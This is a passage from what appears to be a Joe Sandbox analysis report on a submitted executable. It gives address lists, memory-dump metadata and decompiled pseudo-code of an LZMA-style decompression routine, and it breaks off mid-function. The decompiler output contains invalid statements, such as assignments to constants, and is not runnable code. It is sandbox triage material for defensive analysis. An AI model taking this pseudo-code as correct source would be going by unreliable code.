                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a9b
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00406aff
                                                  0x00406b02
                                                  0x00406b07
                                                  0x00406b08
                                                  0x00406b0a
                                                  0x00406b0c
                                                  0x00406b0f
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00406a1b
                                                  0x00406aa1
                                                  0x00406aa7
                                                  0x00406aaa
                                                  0x00406aad
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406abf
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406ae1
                                                  0x00406ae4
                                                  0x00406ae8
                                                  0x00406aea
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406acc
                                                  0x00406ad1
                                                  0x00406ad3
                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af1
                                                  0x00406af8
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                                                  • Instruction ID: a0ed0051221df213f48a7fa37d6c1b626956e64e776f215132b6db312d3b92b6
                                                  • Opcode Fuzzy Hash: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                                                  • Instruction Fuzzy Hash: 10816671D04228DBDF24CFA8C8447ADBBB0FB45301F1181AAD856BB281D7786A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E004065D2() {
                                                  				signed int _t539;
                                                  				unsigned short _t540;
                                                  				signed int _t541;
                                                  				void _t542;
                                                  				signed int _t543;
                                                  				signed int _t544;
                                                  				signed int _t573;
                                                  				signed int _t576;
                                                  				signed int _t597;
                                                  				signed int* _t614;
                                                  				void* _t621;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t621 - 0x40) != 1) {
                                                  						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                  						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                  						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                  						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                  						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                  						_t539 =  *(_t621 - 4) + 0x664;
                                                  						 *(_t621 - 0x58) = _t539;
                                                  						goto L68;
                                                  					} else {
                                                  						 *(__ebp - 0x84) = 8;
                                                  						while(1) {
                                                  							L132:
                                                  							 *(_t621 - 0x54) = _t614;
                                                  							while(1) {
                                                  								L133:
                                                  								_t540 =  *_t614;
                                                  								_t597 = _t540 & 0x0000ffff;
                                                  								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                  								if( *(_t621 - 0xc) >= _t573) {
                                                  									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                  									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                  									 *(_t621 - 0x40) = 1;
                                                  									_t541 = _t540 - (_t540 >> 5);
                                                  									 *_t614 = _t541;
                                                  								} else {
                                                  									 *(_t621 - 0x10) = _t573;
                                                  									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                  									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                  								}
                                                  								if( *(_t621 - 0x10) >= 0x1000000) {
                                                  									goto L139;
                                                  								}
                                                  								L137:
                                                  								if( *(_t621 - 0x6c) == 0) {
                                                  									 *(_t621 - 0x88) = 5;
                                                  									L170:
                                                  									_t576 = 0x22;
                                                  									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                  									_t544 = 0;
                                                  									L172:
                                                  									return _t544;
                                                  								}
                                                  								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                  								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                  								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                  								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                  								L139:
                                                  								_t542 =  *(_t621 - 0x84);
                                                  								while(1) {
                                                  									 *(_t621 - 0x88) = _t542;
                                                  									while(1) {
                                                  										L1:
                                                  										_t543 =  *(_t621 - 0x88);
                                                  										if(_t543 > 0x1c) {
                                                  											break;
                                                  										}
                                                  										switch( *((intOrPtr*)(_t543 * 4 +  &M00406BD6))) {
                                                  											case 0:
                                                  												if( *(_t621 - 0x6c) == 0) {
                                                  													goto L170;
                                                  												}
                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                  												_t543 =  *( *(_t621 - 0x70));
                                                  												if(_t543 > 0xe1) {
                                                  													goto L171;
                                                  												}
                                                  												_t547 = _t543 & 0x000000ff;
                                                  												_push(0x2d);
                                                  												asm("cdq");
                                                  												_pop(_t578);
                                                  												_push(9);
                                                  												_pop(_t579);
                                                  												_t617 = _t547 / _t578;
                                                  												_t549 = _t547 % _t578 & 0x000000ff;
                                                  												asm("cdq");
                                                  												_t612 = _t549 % _t579 & 0x000000ff;
                                                  												 *(_t621 - 0x3c) = _t612;
                                                  												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                  												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                  												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                  												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                  													L10:
                                                  													if(_t620 == 0) {
                                                  														L12:
                                                  														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                  														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                  														goto L15;
                                                  													} else {
                                                  														goto L11;
                                                  													}
                                                  													do {
                                                  														L11:
                                                  														_t620 = _t620 - 1;
                                                  														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                  													} while (_t620 != 0);
                                                  													goto L12;
                                                  												}
                                                  												if( *(_t621 - 4) != 0) {
                                                  													GlobalFree( *(_t621 - 4));
                                                  												}
                                                  												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                  												 *(_t621 - 4) = _t543;
                                                  												if(_t543 == 0) {
                                                  													goto L171;
                                                  												} else {
                                                  													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                  													goto L10;
                                                  												}
                                                  											case 1:
                                                  												L13:
                                                  												__eflags =  *(_t621 - 0x6c);
                                                  												if( *(_t621 - 0x6c) == 0) {
                                                  													 *(_t621 - 0x88) = 1;
                                                  													goto L170;
                                                  												}
                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                  												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                  												_t45 = _t621 - 0x48;
                                                  												 *_t45 =  *(_t621 - 0x48) + 1;
                                                  												__eflags =  *_t45;
                                                  												L15:
                                                  												if( *(_t621 - 0x48) < 4) {
                                                  													goto L13;
                                                  												}
                                                  												_t555 =  *(_t621 - 0x40);
                                                  												if(_t555 ==  *(_t621 - 0x74)) {
                                                  													L20:
                                                  													 *(_t621 - 0x48) = 5;
                                                  													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                  													goto L23;
                                                  												}
                                                  												 *(_t621 - 0x74) = _t555;
                                                  												if( *(_t621 - 8) != 0) {
                                                  													GlobalFree( *(_t621 - 8));
                                                  												}
                                                  												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                  												 *(_t621 - 8) = _t543;
                                                  												if(_t543 == 0) {
                                                  													goto L171;
                                                  												} else {
                                                  													goto L20;
                                                  												}
                                                  											case 2:
                                                  												L24:
                                                  												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                  												 *(_t621 - 0x84) = 6;
                                                  												 *(_t621 - 0x4c) = _t562;
                                                  												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                  												goto L132;
                                                  											case 3:
                                                  												L21:
                                                  												__eflags =  *(_t621 - 0x6c);
                                                  												if( *(_t621 - 0x6c) == 0) {
                                                  													 *(_t621 - 0x88) = 3;
                                                  													goto L170;
                                                  												}
                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                  												_t67 = _t621 - 0x70;
                                                  												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                  												__eflags =  *_t67;
                                                  												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                  												L23:
                                                  												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                  												if( *(_t621 - 0x48) != 0) {
                                                  													goto L21;
                                                  												}
                                                  												goto L24;
                                                  											case 4:
                                                  												L133:
                                                  												_t540 =  *_t614;
                                                  												_t597 = _t540 & 0x0000ffff;
                                                  												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                  												if( *(_t621 - 0xc) >= _t573) {
                                                  													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                  													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                  													 *(_t621 - 0x40) = 1;
                                                  													_t541 = _t540 - (_t540 >> 5);
                                                  													 *_t614 = _t541;
                                                  												} else {
                                                  													 *(_t621 - 0x10) = _t573;
                                                  													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                  													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                  												}
                                                  												if( *(_t621 - 0x10) >= 0x1000000) {
                                                  													goto L139;
                                                  												}
                                                  											case 5:
                                                  												goto L137;
                                                  											case 6:
                                                  												__edx = 0;
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 4);
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x34) = 1;
                                                  													 *(__ebp - 0x84) = 7;
                                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  													L132:
                                                  													 *(_t621 - 0x54) = _t614;
                                                  													goto L133;
                                                  												}
                                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  												__esi =  *(__ebp - 0x60);
                                                  												__cl = 8;
                                                  												__cl = 8 -  *(__ebp - 0x3c);
                                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  												__ecx =  *(__ebp - 0x3c);
                                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  												__ecx =  *(__ebp - 4);
                                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  												__eflags =  *(__ebp - 0x38) - 4;
                                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  												if( *(__ebp - 0x38) >= 4) {
                                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                                  													if( *(__ebp - 0x38) >= 0xa) {
                                                  														_t98 = __ebp - 0x38;
                                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                                  														__eflags =  *_t98;
                                                  													} else {
                                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  													}
                                                  												} else {
                                                  													 *(__ebp - 0x38) = 0;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                                  												if( *(__ebp - 0x34) == __edx) {
                                                  													__ebx = 0;
                                                  													__ebx = 1;
                                                  													goto L61;
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x14);
                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                  														__eflags = __eax;
                                                  													}
                                                  													__ecx =  *(__ebp - 8);
                                                  													__ebx = 0;
                                                  													__ebx = 1;
                                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  													goto L41;
                                                  												}
                                                  											case 7:
                                                  												goto L0;
                                                  											case 8:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 4);
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x84) = 0xa;
                                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x38);
                                                  													__ecx =  *(__ebp - 4);
                                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                                  													 *(__ebp - 0x84) = 9;
                                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  												}
                                                  												while(1) {
                                                  													L132:
                                                  													 *(_t621 - 0x54) = _t614;
                                                  													goto L133;
                                                  												}
                                                  											case 9:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													goto L89;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x60);
                                                  												if( *(__ebp - 0x60) == 0) {
                                                  													goto L171;
                                                  												}
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                  												__eflags = _t258;
                                                  												0 | _t258 = _t258 + _t258 + 9;
                                                  												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                  												goto L75;
                                                  											case 0xa:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 4);
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x84) = 0xb;
                                                  													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                  													while(1) {
                                                  														L132:
                                                  														 *(_t621 - 0x54) = _t614;
                                                  														goto L133;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x28);
                                                  												goto L88;
                                                  											case 0xb:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__ecx =  *(__ebp - 0x24);
                                                  													__eax =  *(__ebp - 0x20);
                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x24);
                                                  												}
                                                  												__ecx =  *(__ebp - 0x28);
                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  												L88:
                                                  												__ecx =  *(__ebp - 0x2c);
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  												L89:
                                                  												__eax =  *(__ebp - 4);
                                                  												 *(__ebp - 0x80) = 0x15;
                                                  												__eax =  *(__ebp - 4) + 0xa68;
                                                  												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                  												goto L68;
                                                  											case 0xc:
                                                  												L99:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xc;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t334 = __ebp - 0x70;
                                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t334;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												goto L101;
                                                  											case 0xd:
                                                  												L37:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xd;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t122 = __ebp - 0x70;
                                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t122;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L39:
                                                  												__eax =  *(__ebp - 0x40);
                                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  													goto L48;
                                                  												}
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													goto L54;
                                                  												}
                                                  												L41:
                                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  												 *(__ebp - 0x48) = __eax;
                                                  												__eax = __eax + 1;
                                                  												__eax = __eax << 8;
                                                  												__eax = __eax + __ebx;
                                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edx = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													 *(__ebp - 0x40) = 1;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													__ebx = __ebx + __ebx + 1;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edx;
                                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L39;
                                                  												} else {
                                                  													goto L37;
                                                  												}
                                                  											case 0xe:
                                                  												L46:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xe;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t156 = __ebp - 0x70;
                                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t156;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												while(1) {
                                                  													L48:
                                                  													__eflags = __ebx - 0x100;
                                                  													if(__ebx >= 0x100) {
                                                  														break;
                                                  													}
                                                  													__eax =  *(__ebp - 0x58);
                                                  													__edx = __ebx + __ebx;
                                                  													__ecx =  *(__ebp - 0x10);
                                                  													__esi = __edx + __eax;
                                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  													__ax =  *__esi;
                                                  													 *(__ebp - 0x54) = __esi;
                                                  													__edi = __ax & 0x0000ffff;
                                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                                  													if( *(__ebp - 0xc) >= __ecx) {
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  														__cx = __ax;
                                                  														_t170 = __edx + 1; // 0x1
                                                  														__ebx = _t170;
                                                  														__cx = __ax >> 5;
                                                  														__eflags = __eax;
                                                  														 *__esi = __ax;
                                                  													} else {
                                                  														 *(__ebp - 0x10) = __ecx;
                                                  														0x800 = 0x800 - __edi;
                                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  														__ebx = __ebx + __ebx;
                                                  														 *__esi = __cx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														continue;
                                                  													} else {
                                                  														goto L46;
                                                  													}
                                                  												}
                                                  												L54:
                                                  												_t173 = __ebp - 0x34;
                                                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                  												__eflags =  *_t173;
                                                  												goto L55;
                                                  											case 0xf:
                                                  												L58:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xf;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t203 = __ebp - 0x70;
                                                  												 *_t203 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t203;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L60:
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													L55:
                                                  													__al =  *(__ebp - 0x44);
